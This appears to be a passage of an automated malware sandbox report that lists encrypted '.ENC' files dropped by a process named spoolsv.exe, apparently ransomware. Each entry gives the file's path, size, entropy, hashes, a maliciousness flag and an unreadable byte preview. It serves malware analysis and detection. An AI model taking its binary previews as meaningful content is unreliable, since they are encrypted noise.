                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:49152:8Q8dcXPaFRPsV/284w7QAsrrkZjhFrkBERV9V1S6eWkdGGgmup36rStuAR0:ZtXPaFRPF8BqrIICnnTeWIGbmuMrt
                                                                                                                                                                                                                                                      MD5:480A0AA301987F225C5C5061EAE6F379
                                                                                                                                                                                                                                                      SHA1:EBE06FA270D9218110808E117C797EC004512595
                                                                                                                                                                                                                                                      SHA-256:A7CB13EF81310F72F698E6CE2029EE2B368D89A30B82A06EC5FC3240C53B9C73
                                                                                                                                                                                                                                                      SHA-512:2F9B06AB6BBDD57556BEA320CA7BC96353B106A9CFAB10FD017A88DC840E2B1603F48AEBCBA26767312419FC2B76E433707B7E834315627AE525F72CA7FC2F6B
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.....%.,....B..e3-.K.8ae.T]...In.4.*.A;</..........n.v#...K.R...'.s..;t.M...e..x....y.A.....ZV..........9...-.`-o..$...`9.z,.E."5.c(...yt...z?.K...mJQ....[....z8TN..^.K.....D....A?iV8.k..n...h3......j........u....N.J9l....&...e..l.....<&1...r._.....3,e(...r...._.j....#...6M&...v..PG...L..o5.^...Mb.......I....<..n. .X#3/.{.!....7:..n..&..*..bb....gL6...o^F..N.....\..P.J...&........Uj&..RX..gQ.VDq.W..-.Q..;.Vl.PK=.~.....K#."V.|X....y...o.*...+...5.D..._d.Q...'i<.....JO....xR....j.J*!.....4...8W.8..y|.=_..vS.X*P>.|..#\..5Y...j.`.*..-...y.7./>r.d....QSX.z.._I.i._.R....... .tG...3x.I.kh..o.yPH....F.:qQ>...t\..`.4.cf...........q..........?.JA....;.v..X....}..I....b..>.W!.g=.^J....;q..M.J........3.c..uB!3p.>.{.....~.....u|......N..g....V.....sD.d|..^....I.\.84...fo2...w..S>.Ou.h(..(....>.H....jC.3G.`.!.o...)........31Gr. ...D......1!7.R.x...fz.7HY...C....=.....A.......R......&....{....V.NddE.>mw...0.$91L..M.F...c.....b.q..............y...p..i6_...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Alpha compressed COFF
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3145744
                                                                                                                                                                                                                                                      Entropy (8bit):7.999943868162717
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:98304:lNMt0+LXE289UqCbnSMqlR39KcZ2zy0Wi:lNmU289KnSDT2z3
                                                                                                                                                                                                                                                      MD5:86224517616CC9487F31D4077F5FC762
                                                                                                                                                                                                                                                      SHA1:A31726FBB56FF9D332480A4FF09EC333688D6245
                                                                                                                                                                                                                                                      SHA-256:007822261BFD2D591A200382B1F81DD940C096A58C91B77B76450BF287513990
                                                                                                                                                                                                                                                      SHA-512:ADC285C6F4011AED391CEBBFD4E9660F2126DDC0B474B2786C3506777F78F634F6C8F48A7CFF318F12EDF4F30541DBE538002D84E32B0F3FD30E66ECD2E193D9
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.....o.8..3...GW ..Y...... ......WV.....5.......c[9...m.N..Q..R...P.\..-U(..qX....:...........:..N.T...l..c..K6.E:+.5..p#.........,W.V.5E.....<s.a.Y..RQ...50W..of.~.#-h..JL.T....y........1.s./.......A...}.X\..._.*r}...92%..}{...^..|.X..K.......j.C.......%.1..y.I.o.8...s0).....4[.]..:......d../.|....I...p.F.:WD.u.}|.xO`.9*.K4F..@b...9..s........H_................=........^..T...z.+.N.b..e..Mm...t$b.... m..3.X.SH..E.SRd.D..d.]g^.Y.4....~b~.....E."....Xl.8.3NqP.9..@.e...+.rdc..G....X1%(.....q(...U.Q.-Bt.4.mnI...yE..x J...r:d.TM.....'6f..{g@p.....2....g.| .e&....... .i..y8l.w.....u....;.D.........jje...n..=.b...............x..>..J..n.;''...X.6.WOO.h.j.Tx0.r.q....I..^...Sw{2S.d..(.hW....."...gU..fE.'.SM.p?......gj(..Y..j...h.E...X..'.....\o6a...S...p}^"...............X.&.th:......8#e...D.....I.V$..3!i.].f.>\;.X.x........8.,,.AX......6.T...Pd....]!;J.@..}.f@QG..CS..Cb..k...v=.....7......{..c{c.......j....e+...*.W,.y...^.....'.n..l...%._..y.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Alpha compressed COFF
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3145744
                                                                                                                                                                                                                                                      Entropy (8bit):7.999943868162717
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:98304:lNMt0+LXE289UqCbnSMqlR39KcZ2zy0Wi:lNmU289KnSDT2z3
                                                                                                                                                                                                                                                      MD5:86224517616CC9487F31D4077F5FC762
                                                                                                                                                                                                                                                      SHA1:A31726FBB56FF9D332480A4FF09EC333688D6245
                                                                                                                                                                                                                                                      SHA-256:007822261BFD2D591A200382B1F81DD940C096A58C91B77B76450BF287513990
                                                                                                                                                                                                                                                      SHA-512:ADC285C6F4011AED391CEBBFD4E9660F2126DDC0B474B2786C3506777F78F634F6C8F48A7CFF318F12EDF4F30541DBE538002D84E32B0F3FD30E66ECD2E193D9
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.....o.8..3...GW ..Y...... ......WV.....5.......c[9...m.N..Q..R...P.\..-U(..qX....:...........:..N.T...l..c..K6.E:+.5..p#.........,W.V.5E.....<s.a.Y..RQ...50W..of.~.#-h..JL.T....y........1.s./.......A...}.X\..._.*r}...92%..}{...^..|.X..K.......j.C.......%.1..y.I.o.8...s0).....4[.]..:......d../.|....I...p.F.:WD.u.}|.xO`.9*.K4F..@b...9..s........H_................=........^..T...z.+.N.b..e..Mm...t$b.... m..3.X.SH..E.SRd.D..d.]g^.Y.4....~b~.....E."....Xl.8.3NqP.9..@.e...+.rdc..G....X1%(.....q(...U.Q.-Bt.4.mnI...yE..x J...r:d.TM.....'6f..{g@p.....2....g.| .e&....... .i..y8l.w.....u....;.D.........jje...n..=.b...............x..>..J..n.;''...X.6.WOO.h.j.Tx0.r.q....I..^...Sw{2S.d..(.hW....."...gU..fE.'.SM.p?......gj(..Y..j...h.E...X..'.....\o6a...S...p}^"...............X.&.th:......8#e...D.....I.V$..3!i.].f.>\;.X.x........8.,,.AX......6.T...Pd....]!;J.@..}.f@QG..CS..Cb..k...v=.....7......{..c{c.......j....e+...*.W,.y...^.....'.n..l...%._..y.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Alpha compressed COFF
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3145744
                                                                                                                                                                                                                                                      Entropy (8bit):7.999943868162717
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:98304:lNMt0+LXE289UqCbnSMqlR39KcZ2zy0Wi:lNmU289KnSDT2z3
                                                                                                                                                                                                                                                      MD5:86224517616CC9487F31D4077F5FC762
                                                                                                                                                                                                                                                      SHA1:A31726FBB56FF9D332480A4FF09EC333688D6245
                                                                                                                                                                                                                                                      SHA-256:007822261BFD2D591A200382B1F81DD940C096A58C91B77B76450BF287513990
                                                                                                                                                                                                                                                      SHA-512:ADC285C6F4011AED391CEBBFD4E9660F2126DDC0B474B2786C3506777F78F634F6C8F48A7CFF318F12EDF4F30541DBE538002D84E32B0F3FD30E66ECD2E193D9
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.....o.8..3...GW ..Y...... ......WV.....5.......c[9...m.N..Q..R...P.\..-U(..qX....:...........:..N.T...l..c..K6.E:+.5..p#.........,W.V.5E.....<s.a.Y..RQ...50W..of.~.#-h..JL.T....y........1.s./.......A...}.X\..._.*r}...92%..}{...^..|.X..K.......j.C.......%.1..y.I.o.8...s0).....4[.]..:......d../.|....I...p.F.:WD.u.}|.xO`.9*.K4F..@b...9..s........H_................=........^..T...z.+.N.b..e..Mm...t$b.... m..3.X.SH..E.SRd.D..d.]g^.Y.4....~b~.....E."....Xl.8.3NqP.9..@.e...+.rdc..G....X1%(.....q(...U.Q.-Bt.4.mnI...yE..x J...r:d.TM.....'6f..{g@p.....2....g.| .e&....... .i..y8l.w.....u....;.D.........jje...n..=.b...............x..>..J..n.;''...X.6.WOO.h.j.Tx0.r.q....I..^...Sw{2S.d..(.hW....."...gU..fE.'.SM.p?......gj(..Y..j...h.E...X..'.....\o6a...S...p}^"...............X.&.th:......8#e...D.....I.V$..3!i.].f.>\;.X.x........8.,,.AX......6.T...Pd....]!;J.@..}.f@QG..CS..Cb..k...v=.....7......{..c{c.......j....e+...*.W,.y...^.....'.n..l...%._..y.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\store.jfm.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:DOS executable (COM, 0x8C-variant)
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16400
                                                                                                                                                                                                                                                      Entropy (8bit):7.9901368515652145
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:384:K4hODydxQo/i5GNmSFahK7NTZfZZN+TGrG6p:K4gavq5GNBFf7NVbNX
                                                                                                                                                                                                                                                      MD5:999CB89AF560DA95E813DF58E73A8253
                                                                                                                                                                                                                                                      SHA1:875D615E55F6098D39B463B578FCBEA395176C69
                                                                                                                                                                                                                                                      SHA-256:1F946A6A240E56FDAB856EC2D14C3340D5B1AAE34323A23E867AAB7F70704A45
                                                                                                                                                                                                                                                      SHA-512:8DB4157DDD0B530065678F0DD51589BD3EFCF2CB155D7840750E014FCEE3CD0FB87E9C7330E633932202D618CA1646D1B700AAE7FBBB1C0FF3738BC36D66CB4F
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:....\....wZ<...}Z.4....X...4;.$.....Q|.@Gj...^,y.}.....3..l.j..j....l...<.*.=.#/.}y(.W.L..b..6t.....IP..=.J.@...HUf.E.Y...k..L.U*.&!.C..~....K...D...Ny....H..<..c[.T;.q.L../B.! .....'9.."...?..."wA...a..L`?....g.....u..2+....?...........U!.T..R../.E...I...]6.e9c*...r8q.. ..:'..j.l...hG.V.......*..s...&|.7...u.[..,....6#..=...;..~)....Z..N...x.....z.e4.f..............B...t;.!.BR.?..VO5..X.q......%...1...h...i....F#.+...*...F...x.. .?-.%dHZ..*.o..@.N...*..L..$.....mw.q..\.J#...]...D....-rW..".:.T<...d..r.x.....P.v46......y....p..F..^..`....A..a.9D.J......`......1.?._j<.x....G.D[..M&).LV......*X.....].C..2.0.!&..zm7....*.........u.-b.)R....H>.-...:J*....B^..ds..!....e{.......q%..{.1.c...8........:M.y^.....j>cg.o.-..M.*.|...Zq[..A.4.;..5(.:b...........0.I..l..4..P...@......C..&..~.`?:..$..;S.>.K.fg(K..Om....u*L.^fv...VS.....I4.viW.f.-&N.....V.I..-..?.<...V.G..HW.g0..|<!....Wh.J...z..'...y...*.Yz.0WC...2O......La..\D}...v]......^!....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):6291472
                                                                                                                                                                                                                                                      Entropy (8bit):7.999966973991741
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:98304:EQdcDLOvw/BKI+hUF/dKc0zkLz7ArUoEntsoWcfKhJtGgJVTNOzmKPWLF:EQeavw/81kX0zutH2oWtJtJejWLF
                                                                                                                                                                                                                                                      MD5:28B33909EEDBA6AD79009FA0E1737499
                                                                                                                                                                                                                                                      SHA1:E2FB3CBA6407D087A44CB9983D1D0F7123BCE4DD
                                                                                                                                                                                                                                                      SHA-256:4DB0E7C4F8A78E4328FBBD0B39D43C0B74722EBBAF434482A0050D6940374F79
                                                                                                                                                                                                                                                      SHA-512:9AC55BD070CE1326CD89883B4FE2C61211D5FEEADA756ABF046C359949FF574C5B29A030B60E9F2A6F0FA334976E87CBC283CB482C8BD19AF1CFEE0CE3FADC74
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:..e.n...*oX`..v.r-B.hF.s9m....*D...zo.<~.+......uc.i.L!......N.+....t14HU.ei.9I....`..'.0P..4.wy9.CN.m.ts\c..M...ZG$.....=..4..Yg.l....b-.<.J.ao..(...|f&.l.....S"..op,.._G.m.e.I.&.Q.ba..|..fb..!....hy... .mI....XP.|}q#.a..v.....Zm..j.Ssba.K..s. A....La..L.......n,}u.........6...u...{..M{....PG.....d..:s.TQk..@.2...M....m......E....E^...:.R....Ru.a....j-..pDO...D.!...uL..7.s.d.zv....q.<-..WYz..}..e~..bGi.-/A.2"..ZBU....g...C..sFJg.T.%m..~.....%d.])U..^._|(.o..9.`.v.N.........W..}xP......r].....I.1..A.a...`<........R2/.,...0.q,.....!....=.....[X.M2....8QB!.e{...E....f..!Y...l=.H.3..AM.5Pe..;6O!j."!.0q'......X.}..[.-...?...Y.C&U.vptq......"..O.}!.U..w..#..$..sB{..}..".9.<..K.I..U....A.uH...4%.nS^r..'$...e.s.U?..=.1...B..?.P...}.A..P.A.:.%..kh.~%.&..n...<l.S....e2Q.]T.-..q.`.E./{..........G... .s'.,....3C..........s..(.!......T=...sp..J.....[..t9.L..F`tj..a....$.E..%..yu...Tg.m..9=......)t._.j..^.q7`.0..w..~<7.h..s.r...Z..`......lF$

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4880
                                                                                                                                                                                                                                                      Entropy (8bit):7.960794839791205
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:xE9PuCB/Afjhrap2KYam099/yJu/ULOnbI2r60QSHxYpCbYOhSuF1:x7C9Alupaam0v/eu/UL32/RndhSuF1
                                                                                                                                                                                                                                                      MD5:2CCCD78C99FD51C90145406449CC694F
                                                                                                                                                                                                                                                      SHA1:D259FB597EA66168152553BDAAE3DC66CB87C46A
                                                                                                                                                                                                                                                      SHA-256:76CD27479821CBAA0257D49A053F7B22ED23F8B1570FF575795E144396016AB9
                                                                                                                                                                                                                                                      SHA-512:7D3233592255C47D5E841C994334811E804EF3ED0B3FA72B265686F1D874D7E163306921C5DD4D203C06EEA98A29F81FBD0954EECB4A43DC35F6DEDBB5E22AF5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:4q.|m..?...6&.;~......d>..0.g...-p.....U;.}....P...%....U8..A..O..........W2O..`r.C;..!P'..RP.}..rc....lM..a6..A:.@.o.uEh...y..*3.....Srq..G.......uI.....M.....t)S...n.....A...d.5..a...`$..g.5;.z......kk...N.H.V...1w....~]h..."W....:.AQ[...r...4.5..3......6......kE...6..K..4Ny..'...{..L\R@...,..S..$.d..Xh8.kSw...\..@..rz?..<.....%j..a......2+.]}Xy......,+F...._N..[......h.NK..}.=....K.[...]...A.E.o...3X..C@I..!..D..[...H./kD^.R....u....,....w..|+..P..!.......=.Mz..F..Q,.......n..(.C..kE...d........~R..R.o.>.O..0.....T4....1?.s..zQ...r..!.3.*....~....$.CPo<..y@.+`Dg.b{......q.?...B.#.e.n;*..}..`...c...M.PI..\.r..`.....E.]}...+.N.`..!.(Oj....%K..y..DlM...R1t.a)f..*?.E..P...k.H.4.;WN.v...2.2F...=.1.>f..KbW......2i.[U..p5#.O.....^.Tj..8.c5..i...~....A.D.t..#....xF ........Hv.........,...xT.=..-......N.....x|.<:6.7.S.{.Q...hGm..,.&2.XIM.$.m...I.|]W_u]@*/./...}W.......c.LuM.H...+U...N......Y......v...|..E.}E.P........N....!.;.......7..?.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\ConnectedDevicesPlatform\Connected Devices Platform certificates.sst.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):656
                                                                                                                                                                                                                                                      Entropy (8bit):7.741576164498232
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:HCQEUDMKCAMH0/qiPc4slKGL5J45bb9pjYjGwwr1GSy8GG9O3rlH0FpwkWin:iQnDhHMH0/nkhljj45bbzjYKVkG6xHIP
                                                                                                                                                                                                                                                      MD5:2746590EF4B935E9276295C8443329AE
                                                                                                                                                                                                                                                      SHA1:19438A774094202D03179692301DE7A30A1412B5
                                                                                                                                                                                                                                                      SHA-256:59D8959FD94DFED11D61324BF3FAF18D8C91AFEF04FDEE25A726D8162255576E
                                                                                                                                                                                                                                                      SHA-512:229A1B26EF566E5E1C853894CE6E3AE882818A26ED7942BB9F20AC6E1CA58C33C1988FA7C919CE1A2C78B86C6F5824156EF3D07D4E4364CD67868CEC232C4A08
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:>...S.X...(../.?\.8BgJ.dRNQ.....LL..c.......x.4.....*Mo.;.c.....;i'.,.}ug...g..<&.[&.G.0=...G>*.....(l.b/c..B.n|_...Gy..!......~..N.L.{.]iKG..,t..g.p..)....-{.........Cn.Y.<W.aL.+"..)...:...&....TW....8..L......K......aQ}.........VZ....L$.....N...)....6'S(.#.d.J.".%#..NJ.u.6...17ar.c.............n....Q.0....j.WB..I..S.k.F.....t...u<..~..a0..((>..V.*l.......x.g=.r...........H..}..v.....r~...Y...D...)..P.......~..A.&s.9i.n:......D.l..f...7{.E.m..KZ..7u.J.,..D.h.K.)...o)..Ez.^.Z]......~...M.2.3dUs.2H.........4.Q.d..e~....U..}.:s^.t..}.....W!DS..2`1.Pqp....W.....]...3W.........u...S.......L.....k..DIA..U.z..w.v.....6%.zW.f.E.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdp.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):976
                                                                                                                                                                                                                                                      Entropy (8bit):7.797200557198716
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:u76D1DQ83of3OEergDVTjKn/7f6p6ztwz6yZ563g3NasYdhJuyQD1ozmrP:uOWD+/gxTjK/7fC6GmyZH3Na3fE1KzyP
                                                                                                                                                                                                                                                      MD5:C2E3AE12F29B4AC3ED228635F159535F
                                                                                                                                                                                                                                                      SHA1:8B3B002B5591A73CB69766A45B3178F80C555E84
                                                                                                                                                                                                                                                      SHA-256:6666D149F8CE1301BE2A48EED3246DD198CA8D58F9176E90D0B87FBD3F636790
                                                                                                                                                                                                                                                      SHA-512:C4A804A443AE7538017122475073066DD3C855B7508B2E8BF3E1180DD044FD5CBC699A07395E09075B3A38391F45F190419FFEC5520C6CC46B4FFABC85E578EC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.5n.){|On..`..AuTU...~J..._Y..K:.HP0p....#..;......".6.........oA|.[..&....'& ..UF..j...4.g.G.h.'C...Z.....x.-n.[.C.0..oZ..o.J*.Q.W..euln.....K....zKE..I.Z..V.G...p..9x{W.Z@.c.y&...j.;K..mp..u2......L.O...l^....$....a..'.......O..=...A.*r..Z...%|.......)...(..l.....f.v^....w(.".l..m...6..9.8-..Ow..R..$W..L.o..M.h.=....O..8.=.`$?.FZ/..r.\...d S.t../....I........N3}.D...8.[..../..R.&..H6.<~L5_....F.F..9.^.HeZD.Ok.....D.......0..n..f.=...M....T.9.....B'6.3I.p...O.....E&...]..........Cn...o.x..[.NF..."....MP.Q.b..e).s.k..l.....x./P.+.D0..(.......{...T......X:1..._.....|...b.9.rHD.d...C.(..0l......d..............T'.B.v..`5..o...g^.;S%......zqq5.Xq.|.`...;g.3.....V2.+@.A4Sj..,.k..s....[...@d.E..@.X}0w.eXr..;.....3.d.....Bj....&.?-.../.N....W.....8......<F..+....0_..).v.6..{0$.S]../(.=V..O`......5......?.a ..0...r..NJ.,6.r..l..?.M.'p|.x..xk#...#.".t....,....Ru.z M...3...ge.q.?..9......"..z.'(#k...Y$.....zGf. ..Q....C5%wj

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdpresource.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                                                                                                      Entropy (8bit):5.738204882778696
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:SiVF7XqEf7l6dco9DQZXHLXn:SibqEp6dco0rX
                                                                                                                                                                                                                                                      MD5:F46C849F3196C6762F04EAB25F802982
                                                                                                                                                                                                                                                      SHA1:404804C12A52A3C895E7634AD16EB68E7888D132
                                                                                                                                                                                                                                                      SHA-256:465E7E72300E5C2F6359CEDA7266DF3FA673C93E7CF154DCFD56FDFB967CFA22
                                                                                                                                                                                                                                                      SHA-512:44AE7A3F42830385204CFEFD6850547BFC1ADA023210C31D3778A748A982C8F5A50BC00D48F4A029702DE98065A356FC6A69959E357401897F59B71F40432F0D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:%..p.T..MB. ^..E./C......Dd'..09|...xnh5.v......\....T..le...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-shm.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-wal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):65568
                                                                                                                                                                                                                                                      Entropy (8bit):7.996929701678267
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:1536:GCKBEaIrfoMkU72SNzEPNE4wQ/rqkvTcrFBIpSQRKqj+:GlEas5k/SNu2lQmwcr8Mqa
                                                                                                                                                                                                                                                      MD5:2F77E307A796DC2B847ADEBBC799A2F6
                                                                                                                                                                                                                                                      SHA1:AE347D4088EA6B6EA5CBDC0320BACD9C3059E98A
                                                                                                                                                                                                                                                      SHA-256:AFEA466E4A120007487295D8884FC57E4BDF18325FD07F2DC2D6A800BDB09D11
                                                                                                                                                                                                                                                      SHA-512:2C6FB703214BEC0C2A5BCEE23CBA41B0CDFFB5E8DEB3716A5311270F7DB1F7B93A441216E32D397A9B21296D06C50B783392559BE48E7E047FF38BAEF6654CFE
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:Pd9..NA..K.g....?..5V...L\u_..\<2a.*....&..1..k...{|...~._DUt..D......y...l5.Z.}.w.P....T..+n...[...-...C3e...L.....#..d,.7...C".D5..{\...,.k.FCxZ....3S./%...G....q3w.2..<R_....u...Y$o....z..T=.qDi..F.....8j"..}g..3DoR.>/......V..!..B.p.-Kp.+Y.Z.=q.....QS...`H......CS+....#.....*...!..Z........].).u....2E..l..u..p.<<.<O........+......@KF[@. .3h...@....d.=e..........T?..Y.q....L.....vW..z.............Q"h.J...b.du...|1..E.aUT.D...u6"..BJn.G.l./3....+?.k.mS....f.6.ad..c..........pWyx4.T.......]...A.\......czCX....e..*t....3..W[f....9..4...|.&NA..W...^l..w...kJ...L."..0.c..#.,.$y#...2.....W...l....)....*.....`H ."......./.F.....~g......,...b..OE.w#..v.I...N.[GGw...^U.o.....7...<..fC.R..>..e.}....T.q7lt+.bX"....D.t.Bk...b.n.....*....Or....KpJ8....L.....fb.f.e.Ms.m.m#....z...._.M...#.9t)gu.23.RX.^.f.. ...Z&K.0..Up...EfGo<.7.......F..=).....c.Mx.#.zA..L..,.$...E.R].r..0...vHQ.......S..E}.A...B.}d..X.n.....#e...,..J.7o.<....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
